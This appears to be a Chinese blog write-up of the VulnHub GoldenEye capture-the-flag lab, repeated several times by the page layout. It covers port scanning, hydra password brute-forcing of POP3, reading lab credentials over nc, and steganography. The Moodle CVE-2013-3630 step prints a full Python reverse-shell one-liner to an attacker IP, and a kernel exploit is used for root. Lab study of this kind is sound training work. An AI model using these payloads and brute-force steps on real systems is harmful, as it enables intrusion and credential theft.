[VulnHub] - 1GoldenEye靶场


靶机：https://www.vulnhub.com/entry/goldeneye-1,240/#/
目标：取得root权限+2Flag
难度：中
涉及知识点：
靶机ip：192.168.56.101
攻击机ip：192.168.56.104

一、信息收集

1、主机发现

#主机发现
arp-scan -l

2、端口扫描

目前得知开放的端口是25，80，55006，55007，其中80是web服务，25是smtp邮件服务器，5506/5507是POP3协议。

└─# nmap -p- -A -sV -T4  192.168.56.101
25/tcp    open  smtp     Postfix smtpd
80/tcp    open  http     Apache httpd 2.4.7 ((Ubuntu))
55006/tcp open  ssl/pop3 Dovecot pop3d
55007/tcp open  pop3     Dovecot pop3d

3、web页面勘测

发现网站页面给出提示，路径/sev-home/可以登录，但是现在还不知道用户名和密码。

返回页面查看源代码，在“terminal.js”中看到以下提示，很有可能这个Boris/Natalya就是我们所需要的用户名，但是url加密后进行解密得到InvincibleHack3r

//鲍里斯，确保你更新了默认密码。
//我的消息来源说军情六处可能计划渗透。
//警惕任何可疑的网络流量。。。。
//
//我在下面给你编码了p@sword。。。
//
//&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;
//
//顺便说一句，娜塔莉亚说她可以破解你的密码

在使用Boris/InvincibleHack3r登录发现不对，尝试了把用户名boris小写后登录成功,这边提示pop3接口，很有可能就是咱们通过信息收集收到的55006，55007这两个端口.

4、信息枚举

hydra爆破pop3

接着通过Boris/Natalya用户名枚举密码，得到两个可用的用户名密码

echo -e "natalya\boris" > user.txt
hydra -L user.txt -P /usr/share/wordlists/fasttrack.txt 192.168.56.101 -s 55007 pop3

用户：boris 密码：secret1!
用户：natalya 密码：bird

通过NC登录pop3查看邮件信封内容枚举:

在第二封信中发现用户名和密码用户名：xenia密码：RCP90rulez！，同时给了我们外部内部域的 URL：severnaya-station.com/gnocertdir，接着通过hosts绑定主机192.168.56.101访问到域名对应的地址，用户名和密码是刚刚第二份邮箱所得到的。

nc 192.168.56.101 55007     ---登录邮箱
user boris                 ---登录用户
pass secret1!              ---登录密码
list                       ---查看邮件数量
retr 1~3                   ---查看邮件内容

nc 192.168.56.101 55007     ---登录邮箱
user natalya               ---登录用户
pass bird                  ---登录密码
list                       ---查看邮件数量
retr 1~3                   ---查看邮件内容

在左侧的Messages功能菜单可以发现Dr Doak给xenia的消息，dork疑似用户名再次爆破得到用户名和密码

hydra -l doak -P /usr/share/wordlists/fasttrack.txt 192.168.56.101 -s 55007 pop3
login: doak   password: goat

再次使用账户登录pop3服务器,发现登录密码

nc 192.168.56.101
user doak
pass goat
list
retr 1
username: dr_doak
password: 4England!

5、隐写解密

使用dr_doak登录web，发现右侧My private files下有一份txt的文件，内容提示访问该地址/dir007key/for-007.jpg，使用exiftool进行隐写查看发现base64编码，解密后得到xWinter1995x!，因在txt文件中得知了用户名是admin

6、漏洞发现

在网上找到该版本的Moodle存在远程命令执行漏洞（CVE-2013-3630）。首先Home / ► Site administration / ► Plugins / ► Text editors / ► TinyMCE HTML editor，将Spell engine更换为PSpellShell。

然后，在Home / ► Site administration / ► Server / ► System paths的Path to aspell处上传如下代码：

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.104",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

kali监听来自web发送的shell,成功拿到普通用户权限。

nc -nvlp 9001

7、提权

在kali搜索该系统发现37292.c的提权利用，但是目标主机上并未存在gcc，后而发现cc也是可以实现，提权，最后成功获取到root权限

searchsploit ubuntu 3.13      
37292.c

posted @ 2024-11-26 17:27 AuriGe 阅读(80) 评论(0) 收藏举报

刷新页面返回顶部

坚持、沉淀、成长

平静的海面培养不出优秀的水手

[VulnHub] - 1GoldenEye靶场

一、信息收集

1、主机发现

2、端口扫描

目前得知开放的端口是25，80，55006，55007，其中80是web服务，25是smtp邮件服务器，5506/5507是POP3协议。

3、web页面勘测

发现网站页面给出提示，路径/sev-home/可以登录，但是现在还不知道用户名和密码。

返回页面查看源代码，在“terminal.js”中看到以下提示，很有可能这个Boris/Natalya就是我们所需要的用户名，但是url加密后进行解密得到InvincibleHack3r

在使用Boris/InvincibleHack3r登录发现不对，尝试了把用户名boris小写后登录成功,这边提示pop3接口，很有可能就是咱们通过信息收集收到的55006，55007这两个端口.

4、信息枚举

hydra爆破pop3

接着通过Boris/Natalya用户名枚举密码，得到两个可用的用户名密码

通过NC登录pop3查看邮件信封内容枚举:

在第二封信中发现用户名和密码用户名：xenia密码：RCP90rulez！，同时给了我们外部内部域的 URL：severnaya-station.com/gnocertdir，接着通过hosts绑定主机192.168.56.101访问到域名对应的地址，用户名和密码是刚刚第二份邮箱所得到的。

在左侧的Messages功能菜单可以发现Dr Doak给xenia的消息，dork疑似用户名再次爆破得到用户名和密码

再次使用账户登录pop3服务器,发现登录密码

5、隐写解密

使用dr_doak登录web，发现右侧My private files下有一份txt的文件，内容提示访问该地址/dir007key/for-007.jpg，使用exiftool进行隐写查看发现base64编码，解密后得到xWinter1995x!，因在txt文件中得知了用户名是admin

6、漏洞发现

在网上找到该版本的Moodle存在远程命令执行漏洞（CVE-2013-3630）。首先Home / ► Site administration / ► Plugins / ► Text editors / ► TinyMCE HTML editor，将Spell engine更换为PSpellShell。

然后，在Home / ► Site administration / ► Server / ► System paths的Path to aspell处上传如下代码：

kali监听来自web发送的shell,成功拿到普通用户权限。

7、提权

在kali搜索该系统发现37292.c的提权利用，但是目标主机上并未存在gcc，后而发现cc也是可以实现，提权，最后成功获取到root权限

公告

坚持、沉淀、成长

平静的海面培养不出优秀的水手

[VulnHub] - 1GoldenEye靶场

一、信息收集

1、主机发现

2、端口扫描

目前得知开放的端口是25，80，55006，55007，其中80是web服务，25是smtp邮件服务器，5506/5507是POP3协议。

3、web页面勘测

发现网站页面给出提示，路径/sev-home/可以登录，但是现在还不知道用户名和密码。

返回页面查看源代码，在“terminal.js”中看到以下提示，很有可能这个Boris/Natalya就是我们所需要的用户名，但是url加密后进行解密得到InvincibleHack3r

在使用Boris/InvincibleHack3r登录发现不对，尝试了把用户名boris小写后登录成功,这边提示pop3接口，很有可能就是咱们通过信息收集收到的55006，55007这两个端口.

4、信息枚举

hydra爆破pop3

接着通过Boris/Natalya用户名枚举密码，得到两个可用的用户名密码

通过NC登录pop3查看邮件信封内容枚举:

在第二封信中发现用户名和密码 用户名：xenia密码：RCP90rulez！，同时给了我们外部内部域的 URL：severnaya-station.com/gnocertdir，接着通过hosts绑定主机192.168.56.101访问到域名对应的地址，用户名和密码是刚刚第二份邮箱所得到的。

在左侧的Messages功能菜单可以发现Dr Doak给xenia的消息，dork疑似用户名再次爆破得到用户名和密码

再次使用账户登录pop3服务器,发现登录密码

5、隐写解密

使用dr_doak登录web，发现右侧My private files下有一份txt的文件，内容提示访问该地址/dir007key/for-007.jpg，使用exiftool进行隐写查看发现base64编码，解密后得到xWinter1995x!，因在txt文件中得知了用户名是admin

6、漏洞发现

在网上找到该版本的Moodle存在远程命令执行漏洞（CVE-2013-3630）。首先Home / ► Site administration / ► Plugins / ► Text editors / ► TinyMCE HTML editor，将Spell engine更换为PSpellShell。

然后，在Home / ► Site administration / ► Server / ► System paths的Path to aspell处上传如下代码：

kali监听来自web发送的shell,成功拿到普通用户权限。

7、提权

在kali搜索该系统发现37292.c的提权利用，但是目标主机上并未存在gcc，后而发现cc也是可以实现，提权，最后成功获取到root权限

公告

在第二封信中发现用户名和密码用户名：xenia密码：RCP90rulez！，同时给了我们外部内部域的 URL：severnaya-station.com/gnocertdir，接着通过hosts绑定主机192.168.56.101访问到域名对应的地址，用户名和密码是刚刚第二份邮箱所得到的。